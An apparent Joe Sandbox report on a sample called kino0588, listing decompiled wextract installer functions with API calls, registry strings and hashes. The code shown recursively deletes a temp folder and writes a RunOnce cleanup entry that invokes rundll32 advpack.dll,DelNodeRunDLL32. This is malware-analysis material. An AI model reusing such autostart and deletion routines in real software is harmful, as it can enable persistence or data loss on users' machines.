                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00192FC6
                                                                                                                                                                                                                                    • DecryptFileA.ADVAPI32 ref: 00192FE6
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00192FF8
                                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019301C
                                                                                                                                                                                                                                      • Part of subcall function 001951E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00192F4D,?,00000002,00000000), ref: 00195201
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                    • API String ID: 2126469477-3395714304
                                                                                                                                                                                                                                    • Opcode ID: 080184617404c384505e176499dc08e07a186de8eb62cb83c8f5831a200e595d
                                                                                                                                                                                                                                    • Instruction ID: 8fd74bd6f42d5cb74ca2a443191c506baeaecc77e65ac915a8d53ccb9d0519ff
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 080184617404c384505e176499dc08e07a186de8eb62cb83c8f5831a200e595d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2641C231A002059BDF30AB75AC49A6A33B8EB65B50F08016BF951C3991EF74CEC4CAA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00192390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E00192390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x198004; // 0x21bd9a3c
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00196CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00191680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E001916B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E00191680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E001916B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E001916B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E0019658A( &_v280, 0x104, 0x191140);
								E00192390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                                                    0x00192398
                                                                                                                                                                                                                                    0x0019239e
                                                                                                                                                                                                                                    0x001923a3
                                                                                                                                                                                                                                    0x001923a5
                                                                                                                                                                                                                                    0x001923ae
                                                                                                                                                                                                                                    0x001923b3
                                                                                                                                                                                                                                    0x001924cb
                                                                                                                                                                                                                                    0x001924d2
                                                                                                                                                                                                                                    0x001924d3
                                                                                                                                                                                                                                    0x001924d4
                                                                                                                                                                                                                                    0x001924df
                                                                                                                                                                                                                                    0x001923c2
                                                                                                                                                                                                                                    0x001923d1
                                                                                                                                                                                                                                    0x001923db
                                                                                                                                                                                                                                    0x001923e4
                                                                                                                                                                                                                                    0x001923f6
                                                                                                                                                                                                                                    0x001923fc
                                                                                                                                                                                                                                    0x00192401
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192407
                                                                                                                                                                                                                                    0x00192407
                                                                                                                                                                                                                                    0x00192408
                                                                                                                                                                                                                                    0x00192411
                                                                                                                                                                                                                                    0x0019241f
                                                                                                                                                                                                                                    0x0019247a
                                                                                                                                                                                                                                    0x00192483
                                                                                                                                                                                                                                    0x00192495
                                                                                                                                                                                                                                    0x001924a3
                                                                                                                                                                                                                                    0x00192421
                                                                                                                                                                                                                                    0x0019242f
                                                                                                                                                                                                                                    0x00192453
                                                                                                                                                                                                                                    0x0019245d
                                                                                                                                                                                                                                    0x00192466
                                                                                                                                                                                                                                    0x00192472
                                                                                                                                                                                                                                    0x00192472
                                                                                                                                                                                                                                    0x0019242f
                                                                                                                                                                                                                                    0x001924af
                                                                                                                                                                                                                                    0x001924b5
                                                                                                                                                                                                                                    0x001924be
                                                                                                                                                                                                                                    0x001924c5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001924c5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,00198A3A,001911F4,00198A3A,00000000,?,?), ref: 001923F6
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,001911F8), ref: 00192427
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,001911FC), ref: 0019243B
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00192495
                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 001924A3
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 001924AF
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 001924BE
                                                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(00198A3A), ref: 001924C5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                                                    • Opcode ID: 4734a7170b2c0e7e4a84cb80b76ba2e06753e2f09a0ad4141cf9ed68722d52bb
                                                                                                                                                                                                                                    • Instruction ID: 762b827e17ceb7d725b00e4e21c17ab7daddea068e358a6acaac49b7f71988bb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4734a7170b2c0e7e4a84cb80b76ba2e06753e2f09a0ad4141cf9ed68722d52bb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F031A131604741BBCB20EB64CC89AEB73ECAFD4305F44492EF55583290EB74998DC792
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00192BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                                                    			E00192BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x19a288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x199124 = 0;
				if(E00192CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E00192F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E001952B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x198a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x199a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E00191F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x198588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x199124; // 0x0
				return _t7;
			}


















                                                                                                                                                                                                                                    0x00192c03
                                                                                                                                                                                                                                    0x00192c0d
                                                                                                                                                                                                                                    0x00192c18
                                                                                                                                                                                                                                    0x00192c20
                                                                                                                                                                                                                                    0x00192c2e
                                                                                                                                                                                                                                    0x00192c32
                                                                                                                                                                                                                                    0x00192c36
                                                                                                                                                                                                                                    0x00192c3d
                                                                                                                                                                                                                                    0x00192c43
                                                                                                                                                                                                                                    0x00192c45
                                                                                                                                                                                                                                    0x00192c47
                                                                                                                                                                                                                                    0x00192c49
                                                                                                                                                                                                                                    0x00192c4e
                                                                                                                                                                                                                                    0x00192c4e
                                                                                                                                                                                                                                    0x00192c47
                                                                                                                                                                                                                                    0x00192c32
                                                                                                                                                                                                                                    0x00192c20
                                                                                                                                                                                                                                    0x00192c50
                                                                                                                                                                                                                                    0x00192c54
                                                                                                                                                                                                                                    0x00192c57
                                                                                                                                                                                                                                    0x00192c64
                                                                                                                                                                                                                                    0x00192c66
                                                                                                                                                                                                                                    0x00192c6b
                                                                                                                                                                                                                                    0x00192c6d
                                                                                                                                                                                                                                    0x00192c74
                                                                                                                                                                                                                                    0x00192c76
                                                                                                                                                                                                                                    0x00192c7c
                                                                                                                                                                                                                                    0x00192c7e
                                                                                                                                                                                                                                    0x00192c87
                                                                                                                                                                                                                                    0x00192c89
                                                                                                                                                                                                                                    0x00192c89
                                                                                                                                                                                                                                    0x00192c87
                                                                                                                                                                                                                                    0x00192c7c
                                                                                                                                                                                                                                    0x00192c74
                                                                                                                                                                                                                                    0x00192c8e
                                                                                                                                                                                                                                    0x00192c95
                                                                                                                                                                                                                                    0x00192c98
                                                                                                                                                                                                                                    0x00192c98
                                                                                                                                                                                                                                    0x00192c9e
                                                                                                                                                                                                                                    0x00192ca7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000002,00000000,?,00196BB0,00190000,00000000,00000002,0000000A), ref: 00192C03
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00196BB0,00190000,00000000,00000002,0000000A), ref: 00192C18
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00192C28
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00196BB0,00190000,00000000,00000002,0000000A), ref: 00192C98
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                    • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                    • Opcode ID: 69ee6ef951b60519b29d5574f468655b35223bcfb8ffb9344f25765c1e1a7adb
                                                                                                                                                                                                                                    • Instruction ID: 1fbc81ca713be236751e3ade9d45563e4fd3c4ecff575d1cdfb24e2fc0d15b7a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69ee6ef951b60519b29d5574f468655b35223bcfb8ffb9344f25765c1e1a7adb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 931108712013067BDF207BB8BC89E6F3769AF897A0B080027F900D3651DB71DC85C6A6
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00196F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00196F40() {

				SetUnhandledExceptionFilter(E00196EF0); // executed
				return 0;
			}



                                                                                                                                                                                                                                    0x00196f45
                                                                                                                                                                                                                                    0x00196f4d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00196F45
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                    • Opcode ID: 52fa47d88df07cd76e47448b712f458c23ac0973fbf864fcd524dce1e556dd5a
                                                                                                                                                                                                                                    • Instruction ID: e3e2e4a90d6d736d55712378edfd85d9f12dd5d6c80486405b7d126416ce7976
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 52fa47d88df07cd76e47448b712f458c23ac0973fbf864fcd524dce1e556dd5a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B90026425110047DA105B709D1941579915F4D642BC15471A011C4894DB6044845562
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0019202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E0019202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x198004; // 0x21bd9a3c
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00196CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0019171E("wextract_cleanup3", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup3", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0019658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x199a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x1991e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x1991e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1991e5);
						if(_t90 != 0) {
							 *0x198580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
							E0019171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup3", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E001944B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0019658A( &_v268, 0x104, 0x191140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x198530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                                                    0x0019202a
                                                                                                                                                                                                                                    0x00192035
                                                                                                                                                                                                                                    0x0019203c
                                                                                                                                                                                                                                    0x00192041
                                                                                                                                                                                                                                    0x00192050
                                                                                                                                                                                                                                    0x0019205f
                                                                                                                                                                                                                                    0x00192064
                                                                                                                                                                                                                                    0x0019206f
                                                                                                                                                                                                                                    0x0019208c
                                                                                                                                                                                                                                    0x00192094
                                                                                                                                                                                                                                    0x00192257
                                                                                                                                                                                                                                    0x00192266
                                                                                                                                                                                                                                    0x00192266
                                                                                                                                                                                                                                    0x0019209a
                                                                                                                                                                                                                                    0x0019209b
                                                                                                                                                                                                                                    0x0019209d
                                                                                                                                                                                                                                    0x001920aa
                                                                                                                                                                                                                                    0x001920af
                                                                                                                                                                                                                                    0x001920c9
                                                                                                                                                                                                                                    0x001920d1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001920d3
                                                                                                                                                                                                                                    0x001920da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001920da
                                                                                                                                                                                                                                    0x001920e2
                                                                                                                                                                                                                                    0x00192103
                                                                                                                                                                                                                                    0x0019210e
                                                                                                                                                                                                                                    0x00192116
                                                                                                                                                                                                                                    0x00192122
                                                                                                                                                                                                                                    0x00192128
                                                                                                                                                                                                                                    0x0019212c
                                                                                                                                                                                                                                    0x00192179
                                                                                                                                                                                                                                    0x00192194
                                                                                                                                                                                                                                    0x001921de
                                                                                                                                                                                                                                    0x001921e4
                                                                                                                                                                                                                                    0x00192256
                                                                                                                                                                                                                                    0x00192256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192256
                                                                                                                                                                                                                                    0x00192196
                                                                                                                                                                                                                                    0x00192196
                                                                                                                                                                                                                                    0x0019219c
                                                                                                                                                                                                                                    0x0019219f
                                                                                                                                                                                                                                    0x0019219f
                                                                                                                                                                                                                                    0x001921a1
                                                                                                                                                                                                                                    0x001921a2
                                                                                                                                                                                                                                    0x001921a6
                                                                                                                                                                                                                                    0x001921a8
                                                                                                                                                                                                                                    0x001921b0
                                                                                                                                                                                                                                    0x001921b0
                                                                                                                                                                                                                                    0x001921b2
                                                                                                                                                                                                                                    0x001921b3
                                                                                                                                                                                                                                    0x001921bc
                                                                                                                                                                                                                                    0x001921c7
                                                                                                                                                                                                                                    0x001921cb
                                                                                                                                                                                                                                    0x001921f1
                                                                                                                                                                                                                                    0x001921f6
                                                                                                                                                                                                                                    0x001921fd
                                                                                                                                                                                                                                    0x001921ff
                                                                                                                                                                                                                                    0x001921ff
                                                                                                                                                                                                                                    0x00192204
                                                                                                                                                                                                                                    0x00192213
                                                                                                                                                                                                                                    0x00192218
                                                                                                                                                                                                                                    0x0019221d
                                                                                                                                                                                                                                    0x0019221d
                                                                                                                                                                                                                                    0x00192220
                                                                                                                                                                                                                                    0x00192220
                                                                                                                                                                                                                                    0x00192222
                                                                                                                                                                                                                                    0x00192223
                                                                                                                                                                                                                                    0x00192229
                                                                                                                                                                                                                                    0x0019223d
                                                                                                                                                                                                                                    0x00192249
                                                                                                                                                                                                                                    0x00192250
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192250
                                                                                                                                                                                                                                    0x001921d2
                                                                                                                                                                                                                                    0x001921d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001921d9
                                                                                                                                                                                                                                    0x0019213a
                                                                                                                                                                                                                                    0x00192141
                                                                                                                                                                                                                                    0x00192144
                                                                                                                                                                                                                                    0x0019214c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192163
                                                                                                                                                                                                                                    0x00192172
                                                                                                                                                                                                                                    0x00192172
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192163
                                                                                                                                                                                                                                    0x001920ea
                                                                                                                                                                                                                                    0x001920f0
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00192050
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0019205F
                                                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0019208C
                                                                                                                                                                                                                                      • Part of subcall function 0019171E: _vsnprintf.MSVCRT ref: 00191750
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001920C9
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001920EA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00192103
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00192122
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00192134
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00192144
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0019215B
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0019218C
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001921C1
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001921E4
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup3,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0019223D
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00192249
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00192250
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup3
                                                                                                                                                                                                                                    • API String ID: 178549006-1281856606
                                                                                                                                                                                                                                    • Opcode ID: 333c9a74b689428de139219dcd64de69395d86c8935b660745e4a20f5c787346
                                                                                                                                                                                                                                    • Instruction ID: 226d52c378f8e4f868f08772797392981e382c7f6b36e5acf0d349f58dc9ed01
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 333c9a74b689428de139219dcd64de69395d86c8935b660745e4a20f5c787346
